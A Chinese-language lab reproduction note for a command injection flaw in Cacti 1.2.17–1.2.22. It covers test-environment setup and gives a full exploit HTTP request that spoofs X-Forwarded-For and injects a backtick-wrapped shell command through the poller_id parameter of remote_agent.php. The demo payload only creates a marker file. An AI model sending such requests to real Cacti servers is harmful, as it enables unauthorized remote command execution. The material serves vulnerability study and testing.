一、漏洞概述
Cacti项目是一个开源平台，可为用户提供强大且可扩展的操作监控和故障管理框架。在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
二、环境搭建
使用http://IP:8080访问，使用admin/admin登录，按照说明初始化应用程序。实际上，只需一次又一次地单击“NEXT”，等待即可，即可看到成功页面。

再利用此漏洞之前，添加新的“graphs”,因为此漏洞需要POLLER_ACTION_SCRIPT_PHP的采集器

选择的Graph Type是“Device - Uptime”，点击create

三、漏洞复现
向 Cacti 服务器发送下列请求，即可触发命令注入攻击：

GET/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0(X11;Linuxx86_64;rv:91.0)Gecko/20100101Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: close
Upgrade-Insecure-Requests: 1